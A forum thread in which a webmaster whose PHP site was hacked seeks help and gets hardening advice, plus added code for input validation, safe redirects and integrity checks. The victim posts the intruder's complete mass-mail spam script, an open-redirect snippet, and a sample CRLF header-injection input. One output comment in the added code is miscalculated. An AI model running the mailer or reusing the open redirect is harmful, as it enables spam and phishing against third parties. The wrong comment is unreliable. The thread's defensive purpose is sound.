My site was suspended because someone attacked the site. This was the third time. I have changed my cPanel passwords and closed my cgi-bin directory as well as many submission forms last time, but it was still attacked. I strongly suspect it is a guy who is competing for the top position in the Google index who did this. My site is listed in the first position for a good search term, while his is in the second position. Once he contacted me to list his site on one of my link pages; I declined because his site is really crappy and a type of MFA. I just wonder if this caused him to attack my site to make it disappear from the Google index so that his site becomes the top one. I wonder how I can prevent this. By the way, I wrote the scripts myself. I wonder if there is any free software to detect the flaws in my scripts.
When writing scripts intended to be exposed to anonymous users, security must be uppermost in your mind. Start reading immediately. Start searching for known vulnerabilities for your scripting language of choice and implement fixes.

Always initialize variables to safe, known values before they are used the first time. Always normalize all input from users and the internet before saving it into a local variable, storing it in a database or redisplaying it on the web. This includes URL strings, cookies, etc. For instance, when I want data on a form to be a single email address, I reject anything that does not fit the pattern of a single email address and I convert all unwanted characters to a safe character. If I want a number, I reject all input that is not numbers. If input is supposed to be a certain length, I cut it down to the desired length.

If you are using PHP, you can block any form of injection into any of the GLOBAL variables. In fact, I believe you should be preventing such things as a matter of policy, irrespective of how your php.ini file is configured.

If your site was properly hacked, then the attacker has copies of your scripts. They know better than you how to exploit them to take down your site.

Never locate files which are not intended to be viewed from the web in publicly accessible directories. Remember, your script can read files outside the web directory hierarchy to retrieve configuration and initialization details. At a minimum, password protect include directories. Your script can reach inside when it needs to, but no one else should be able to. Use massively difficult, very long, random name and password combinations for those directories. Ones you could never guess. You want to access them locally or through cPanel, not via ordinary web queries!

Security is simple. DO NOT trust anyone. NEVER trust data received from the internet.
Many thanks for the detailed explanation. Please see my following code. Would this use of $_GET in PHP cause a security problem?

" $url=trim($_GET["url"]); header("Location: $url"); "
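The following is an added worked example, not code from either poster: it applies the normalization advice in the reply above (reject what does not match, bound numbers, cap lengths) and replaces the redirect in this post with one that only sends visitors to a fixed list of local paths. The function names, the allowlist, the sample request and the use of PHP 7.1+ syntax and the mbstring extension are all assumptions made for illustration.

```php
<?php
// Added example: strict input normalization for a PHP form handler and a
// safe replacement for   $url=trim($_GET["url"]); header("Location: $url");
// Function names, the allowlist and the sample request are assumptions.

// Accept exactly one syntactically valid e-mail address, else null.
function clean_email(string $raw): ?string {
    $v = trim($raw);
    // CR/LF inside a "from" or "reply-to" value is how extra mail headers
    // (e.g. a Bcc: list) get smuggled into a contact form; reject outright.
    if (preg_match('/[\r\n]/', $v)) {
        return null;
    }
    return filter_var($v, FILTER_VALIDATE_EMAIL) === false ? null : $v;
}

// Accept only a string of digits within a bounded range, else null.
function clean_int(string $raw, int $min, int $max): ?int {
    $v = trim($raw);
    if (!ctype_digit($v)) {
        return null;
    }
    $n = (int) $v;
    return ($n < $min || $n > $max) ? null : $n;
}

// Free text: drop control characters, cap the length, escape for HTML output.
// (mb_substr assumes the mbstring extension; substr would cut UTF-8 mid-character.)
function clean_text(string $raw, int $maxlen): string {
    $v = preg_replace('/[\x00-\x1F\x7F]/', '', $raw);
    $v = mb_substr($v, 0, $maxlen);
    return htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
}

// Redirect only to a known local path. Passing $_GET["url"] straight into
// header("Location: ...") lets anyone build a link on your domain that bounces
// visitors to any site they like, which is exactly what spam and phishing
// campaigns want from a host that search engines trust.
function safe_redirect_target(string $raw): string {
    $allowed = ['/', '/links.php', '/contact.php'];   // assumed allowlist
    $v = trim($raw);
    // Must be a relative path under this site: no scheme, no host, no leading
    // "//" (protocol-relative), no CR/LF, nothing outside a small safe charset.
    if (preg_match('#^/(?!/)[A-Za-z0-9_./-]*$#', $v) && in_array($v, $allowed, true)) {
        return $v;
    }
    return '/';   // fall back to the home page rather than trusting the input
}

// Constructed sample request standing in for $_GET (not real traffic).
$sample_get = [
    'url'   => 'http://evil.example/phish',
    'page'  => '7',
    'email' => "a@b.example\r\nBcc: victims@example",
];

if (PHP_SAPI !== 'cli') {
    // Under a web server: redirect before any output is sent.
    header('Location: ' . safe_redirect_target($sample_get['url']));
    exit;
}

// Under the CLI: show what each normalizer does with the constructed input.
var_dump(clean_email($sample_get['email']));          // NULL: CRLF smuggled in
var_dump(clean_int($sample_get['page'], 1, 100));     // int(7)
var_dump(clean_text("<b>hi</b>\x00 there", 8));       // string(12) "&lt;b&gt;hi&lt;"
var_dump(safe_redirect_target($sample_get['url']));   // string(1) "/"
```

The allowlist is deliberately a closed set of paths rather than a host check: a host check has to get URL parsing exactly right, while `in_array` against three strings cannot be argued with.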
Some hacker installed the following script and sent mass mail through my site. Damn! Does anyone have any comments on how to prevent this? Now I have deleted the script from my directory. But this is the second time. I think that guy must have found some flaws in my scripts and keeps on doing this.

"
Chuks Is Great
<?
if ($action=="mysql"){
    #Grab email addresses from MySQL
    include "./mysql.info.php";
    if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
        print "Please configure mysql.info.php with your MySQL information. All options are required.";
        exit;
    }
    $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("MySQL connection failed.");
    mysql_select_db($sqldb, $db) or die("Select your database $sqldb");
    $result = mysql_query($sqlquery) or die("Query failed: $sqlquery");
    $numrows = mysql_num_rows($result);
    for($x=0; $x<$numrows; $x++){
        $result_row = mysql_fetch_row($result);
        $oneemail = $result_row[0];
        $emaillist .= $oneemail."\n";
    }
}
if ($action=="send"){
    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%"><div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Mail:</font></div></td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"><input type="text" name="from" value="<? print $from; ?>" size="30"></font></td>
<td width="31%"><div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font></div></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"><input type="text" name="realname" value="<? print $realname; ?>" size="30"></font></td>
</tr>
<tr>
<td width="10%"><div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div></td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"><input type="text" name="replyto" value="<? print $replyto; ?>" size="30"></font></td>
<td width="31%"><div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload Txt:</font></div></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"><input type="file" name="file" size="30"></font></td>
</tr>
<tr>
<td width="10%"><div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div></td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"><input type="text" name="subject" value="<? print $subject; ?>" size="90"></font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain"> Plain
<input type="radio" name="contenttype" value="html" checked> HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Send Emails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>
<?
if ($action=="send"){
    if (!$from && !$subject && !$message && !$emaillist){
        print "Please fill in everything required.";
        exit;
    }
    $allemails = split("\n", $emaillist);
    $numemails = count($allemails);
    #Open the file attachment if any, and base64_encode it for email transport
    if ($file_name){
        @copy($file, "./$file_name") or die("The file you tried to upload to the server could not be copied");
        $content = fread(fopen($file,"r"),filesize($file));
        $content = chunk_split(base64_encode($content));
        $uid = strtoupper(md5(uniqid(time())));
        $name = basename($file);
    }
    for($x=0; $x<$numemails; $x++){
        $to = $allemails[$x];
        if ($to){
            $to = ereg_replace(" ", "", $to);
            $message = ereg_replace("&email&", $to, $message);
            $subject = ereg_replace("&email&", $to, $subject);
            print "Sending mail to $to.......";
            flush();
            $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
            $header .= "MIME-Version: 1.0\r\n";
            if ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
            if ($file_name) $header .= "--$uid\r\n";
            $header .= "Content-Type: text/$contenttype\r\n";
            $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
            $header .= "$message\r\n";
            if ($file_name) $header .= "--$uid\r\n";
            if ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
            if ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
            if ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
            if ($file_name) $header .= "$content\r\n";
            if ($file_name) $header .= "--$uid--";
            mail($to, $subject, "", $header);
            print "ok<br>";
            flush();
        }
    }
}
?>
<p align="center"><b>The Fear Of Efcc & Fbi Is The Beginning Of Stupidity</b></p>
It's Not Our Intention Of Doing It. </b></p>
But We Have To In Order To Survive</b></p>
Keep On Bro</b></p>
By Chuks Alias Unix Crew Team
"
OMG... he owns you!

If you need to, talk to your ISP about all methods by which someone can access your website and fix them. The most obvious is cPanel. You have changed your passwords, so I doubt this is the access route. But change them again. And review who can access cPanel and make sure there is no active guest or demo account.

Secondly, do you have SSH access? If so, you need to limit access to yourself and you need to change the password. In the /etc/ssh/sshd_config file make sure you do not allow root logon and explicitly list people who are allowed access and, for good measure, explicitly list those who are not. For instance:

PermitRootLogin no
DenyUsers user admin guest apache beach bin daemon mysql
AllowUsers zipdisk

If you do not offer FTP, make sure the FTP daemon is turned off. In fact, make sure all unnecessary services are turned off. You should be able to do that from cPanel. Never use FTP to upload files to websites. Always use SSH.

Once you have locked down all access routes into your machine, put your website into "Under Repair" mode and carefully review each and every script that you run. There are a couple of security projects around: I host a small open source one and there is a very good one from an ex-member of the PHP security team called Suhosin. Use one or the other. I use both.

Go through your scripts with a fine-toothed comb. The first thing you want to do is make sure all user input is properly checked so that it is only something that you would allow. Secondly, only allow direct access to scripts which directly send information back to the screen. You can specifically deny direct access to other scripts in an otherwise accessible location as follows.

Put this line in the public script:

define( '_VALID_ZIPDISK', 1 );

Put this in scripts called or included by the public script:

defined( '_VALID_ZIPDISK' ) or die( 'Unexpected server error' );

These tips should help get things back under control.
You should try Snort, but you have to own a server for this. And of course you need a little experience with Snort and *nix systems.
Once your box has been compromised, the best starting point is a fresh installation. Cold, harsh truth I'm afraid. How do you know this person did not back door one of the binaries?

Other things you might wish to consider are:
- Check out how to sanitise input in your PHP scripts;
- Make sure you are running the latest rev of OS and apps; if not the latest, then the rev that contains all applicable security patches;
- Run cron jobs to check sha1 hashes of all binaries and executables regularly against known good copies (look at mtree and the like);
- Run cron jobs to check for file permission changes;
- Use .htaccess as necessary to deny file/directory access;
- Keep your file permissions tight, especially in your DOC_ROOT; you should never have world-writeable files (despite what script README files say);
- Turn off all unnecessary services;
- Set up a local packet filter;
- Consider chrooting Apache, PHP, MySQL;
- Drop FTP altogether (if you have to use it, use vsftpd); use ssh/sftp for file transfers;
- Learn how to admin a box without cPanel and dump it;
- Harden MySQL and Apache (in addition to PHP as suggested above);
etc. etc.

This place will be your best friend: http://www.securityfocus.com/

Cheers,
Well, with this code the hacker can import a shell by linking it to your site (a shell is a program written in PHP that does almost anything once it is loaded on your site). Another thing you might want to do is check your folders for any unknown files, because the hacker might have uploaded a shell code file and hidden it somewhere.
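As an added example (not from any poster in this thread), here is one way to do what the two replies above suggest: a cron-driven check that records the sha1 and permission bits of everything under the web root, then on later runs reports new files (a dropped mailer or shell), modified files, deleted files, permission changes and anything world-writable. It is written in PHP so it runs with what a cPanel host already has. The script name, the web-root path, the baseline location and the command-line usage are assumptions.

```php
<?php
// Added example: baseline-and-compare integrity check for a web root.
// Assumed usage from cron (run as the site owner, not as the web server user):
//   php integrity_check.php baseline /home/site/public_html   # once, on a clean tree
//   php integrity_check.php check    /home/site/public_html   # daily
// The baseline lives outside the web root; keep it readable only by you.
// Paths and file names are assumptions for illustration.

// Walk the tree and record mode bits plus sha1 of every file.
// FilesystemIterator::SKIP_DOTS skips only "." and "..": dotfiles, where
// uploaded shells like to hide, are still scanned.
function scan_tree(string $root): array {
    $entries = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $path => $info) {
        $rel = substr($path, strlen($root) + 1);
        $entries[$rel] = [
            'mode' => substr(sprintf('%o', $info->getPerms()), -4),   // e.g. "0644"
            'sha1' => $info->isFile() ? sha1_file($path) : 'dir',
        ];
    }
    ksort($entries);
    return $entries;
}

// Compare a saved baseline against the current scan and return findings.
function compare_trees(array $baseline, array $current): array {
    $findings = [];
    foreach ($current as $rel => $cur) {
        if (!isset($baseline[$rel])) {
            $findings[] = "NEW            $rel";   // anything you did not put there
            continue;
        }
        $old = $baseline[$rel];
        if ($old['sha1'] !== $cur['sha1']) {
            $findings[] = "MODIFIED       $rel";
        }
        if ($old['mode'] !== $cur['mode']) {
            $findings[] = "CHMOD          $rel {$old['mode']} -> {$cur['mode']}";
        }
    }
    foreach (array_diff_key($baseline, $current) as $rel => $_) {
        $findings[] = "DELETED        $rel";
    }
    // World-writable anything under DOC_ROOT is a finding in its own right,
    // baseline or not: it is how a script with no access of its own gets one.
    foreach ($current as $rel => $cur) {
        if ((octdec($cur['mode']) & 0002) !== 0) {
            $findings[] = "WORLD-WRITABLE $rel ({$cur['mode']})";
        }
    }
    return $findings;
}

$mode         = $argv[1] ?? 'check';
$root         = rtrim($argv[2] ?? '/home/site/public_html', '/');
$baselineFile = '/home/site/.integrity/baseline.json';   // assumed, outside the web root

if ($mode === 'baseline') {
    @mkdir(dirname($baselineFile), 0700, true);
    file_put_contents($baselineFile, json_encode(scan_tree($root), JSON_PRETTY_PRINT));
    chmod($baselineFile, 0600);
    echo "baseline written for $root\n";
    exit(0);
}

$baseline = json_decode((string) file_get_contents($baselineFile), true);
if (!is_array($baseline)) {
    fwrite(STDERR, "no baseline at $baselineFile; run 'baseline' first\n");
    exit(2);
}
$findings = compare_trees($baseline, scan_tree($root));
// cron mails whatever is printed, so stay silent when nothing changed;
// the exit code lets a wrapper script alert some other way if you prefer.
echo $findings ? implode("\n", $findings) . "\n" : '';
exit($findings ? 1 : 0);
```

Take the baseline only from a tree you have just re-deployed from your own copy, not from the box as it stands: a baseline taken after the break-in silently blesses whatever the intruder left behind, which is the point the reply about reinstalling was making.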